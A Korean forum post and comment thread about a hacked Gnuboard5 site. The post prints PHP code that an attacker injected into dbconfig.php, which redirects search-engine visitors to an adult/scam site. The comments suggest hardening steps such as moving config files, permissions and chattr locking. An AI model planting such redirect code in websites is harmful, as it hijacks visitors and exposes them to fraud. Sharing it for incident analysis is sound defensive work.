그누보드5 해킹 후 dbconfig.php에 URL 납취를 하였네요 ㅎ
지속적인 업데이트를 않해줘서 그랬는지
/data 폴더에 접근하여 dbconfig.php를 수정하여
include("jc.php")
error_reporting(0);
$refer=$_SERVER['HTTP_REFERER'];
if(stristr($refer,"daum")||stristr($refer,"naver")||stristr($refer,"http")||stristr($refer,"google")||stristr($refer,"bing")||stristr($refer,"nate")||stristr($refer,"zum")||stristr($refer,"msn"))
{
header("location:http://g***.b*-***.com");
exit();
}
이런짓을 하고 갔네요
자꾸 음란 사이트로 들어가지길래 왜이러나 했디만...
큭 ㅠ
댓글 36개
익명닉네임
9년 전
참고로 너무 힘들면 data 폴더에 dbconfig.php 를 다른곳으로 옴기고 common.php 에서 dbconfig.php 확인 경로를 다른곳으로 옴기세요..ㅎㅎ 잼뜸 ..ㅇㅅㅇ.. 제 사이트 도 그런 경우가 있다보니 보안 펀션만 그누보드5 를 좀 쓰고 나머진 자체제작... ㅇㅅㅇ..
익명닉네임
9년 전
@우성님 굳이 dbconfig.php 를 data 폴더에 넣을 필요가 없죠.. 보안이 걱정되면.. common.php 만 탈취안되면 common.php 에서 dbconfig.php 경로를 다른곳으로 옴기고 data 폴더에 dbconfig.php 를 다른곳으로 옴기면 된다는.. ㅎㅎ
9년 전
어디서 어떻게 뚫렸는지 확인이 가능 한가요?
그누보드 자체에서 뚫린것인지 아님 다른경로로 뚫린것이지....
@익명닉네임 dbconfig.php,common.php 파일을 이동해 놓으면 뭐합니까?
뚤리면 다찾아서 수정하면 아무소용 없는것을.....ㅠㅠ
그누보드 자체에서 뚫린것인지 아님 다른경로로 뚫린것이지....
@익명닉네임 dbconfig.php,common.php 파일을 이동해 놓으면 뭐합니까?
뚤리면 다찾아서 수정하면 아무소용 없는것을.....ㅠㅠ
9년 전
@亞波治 중국발 해킹으로 의심되네요...해커가 정해놓은 사이트 역시 성인 사이트를 가장한 금전 갈취를 목적으로 한것 같은데... 네이버에서 검색하면 TITLE 까지 수정을 해놓았더라구요 ;;;
익명닉네임
9년 전
@편리 근데 data 폴더를 굳이 707 로 셋팅 안하고 755 로 해도 설치가 되는데
755 로 해도 해킹되는건가여?? 개인적으로 궁굼해서 물어봅니닷.
755 로 해도 해킹되는건가여?? 개인적으로 궁굼해서 물어봅니닷.
9년 전
@편리 호스팅에 따라 안되는곳이 많을듯 싶네요....^^;;
쉘에서 chattr 를 쓸수 있으면 잠글수 있을텐데....
chattr +I dbconfig.php
이러면 볼수는 있어도 수정은 불가 할테니.....ㅋㅋ
쉘에서 chattr 를 쓸수 있으면 잠글수 있을텐데....
chattr +I dbconfig.php
이러면 볼수는 있어도 수정은 불가 할테니.....ㅋㅋ
9년 전
@sinbi chattr -i dbconfig.php 입니다.
잠겼는지 확인은 lsattr 하시면 잠겼을때 ----i-------- dbconfig.php 이렇게 출력 됩니다....^^
잠겼는지 확인은 lsattr 하시면 잠겼을때 ----i-------- dbconfig.php 이렇게 출력 됩니다....^^
sinbi
9년 전
@l2zeo ㅋㅋ 그게 가장 확실한 방법이겠네요.
근데, 이온큐브 가격이...ㅡㅡ;
얼마였죠? 20 ~ 30만 사이 아닌가요?
근데, 이온큐브 가격이...ㅡㅡ;
얼마였죠? 20 ~ 30만 사이 아닌가요?
l2zeo
9년 전
@sinbi 지금 찾아보니 179달러에 구매했네요, 프로버전을요.
프로버전이 대략 45만원하는건데 저렴하게 구매했죠.
PHP Encoder Pro Edition 8 for Linux 179.00(USD)
프로버전이 대략 45만원하는건데 저렴하게 구매했죠.
PHP Encoder Pro Edition 8 for Linux 179.00(USD)
9년 전
나는 그거보다
생성된 파일도 없고 변조된 파일도 없는데
메인 캐시의 도메인이 임의로 바뀌던데......
아직 이유는 못찾고 시간도 없고 해서
캐시 사용안함으로 바꿧습니다.
그것도 중국 사이트
그리고 물론, 최신 버전입니다.
생성된 파일도 없고 변조된 파일도 없는데
메인 캐시의 도메인이 임의로 바뀌던데......
아직 이유는 못찾고 시간도 없고 해서
캐시 사용안함으로 바꿧습니다.
그것도 중국 사이트
그리고 물론, 최신 버전입니다.
게시판 목록
자유게시판
| 번호 | 제목 | 글쓴이 | 날짜 | 조회 |
|---|---|---|---|---|
| 공지 |
 thisgun |
2주 전 | 47 | |
| 199718 |
thisgun |
2주 전 | 29 | |
| 199717 | 1개월 전 | 27 | ||
| 199716 |
느긋한카키쿠키
|
1개월 전 | 19 | |
| 199715 |
현대적인무질서한까마귀
|
1개월 전 | 20 | |
| 199714 | 1개월 전 | 30 | ||
| 199713 | 1개월 전 | 38 | ||
| 199712 | 1개월 전 | 299 | ||
| 199711 |
안졸리니졸리니
|
1개월 전 | 147 | |
| 199710 |
 glitter0gim |
1개월 전 | 161 | |
| 199709 |
glitter0gim |
1개월 전 | 94 | |
| 199708 | 1개월 전 | 108 | ||
| 199707 | 1개월 전 | 244 | ||
| 199706 | 1개월 전 | 45 | ||
| 199705 | 1개월 전 | 29 | ||
| 199704 | 1개월 전 | 52 | ||
| 199703 | 2개월 전 | 58 | ||
| 199702 | 2개월 전 | 102 | ||
| 199701 | 2개월 전 | 112 | ||
| 199700 | 2개월 전 | 84 | ||
| 199699 | 2개월 전 | 89 | ||
| 199698 | 2개월 전 | 137 | ||
| 199697 | 2개월 전 | 100 | ||
| 199696 |
 Gothrock |
2개월 전 | 249 | |
| 199695 | 2개월 전 | 92 | ||
| 199694 | 2개월 전 | 121 | ||
| 199693 | 2개월 전 | 189 | ||
| 199692 | 2개월 전 | 202 | ||
| 199691 |
 샬롬이아빠 |
2개월 전 | 174 | |
| 199690 | 2개월 전 | 263 | ||
| 199689 | 2개월 전 | 164 |
댓글 작성
댓글을 작성하시려면 로그인이 필요합니다.
로그인하기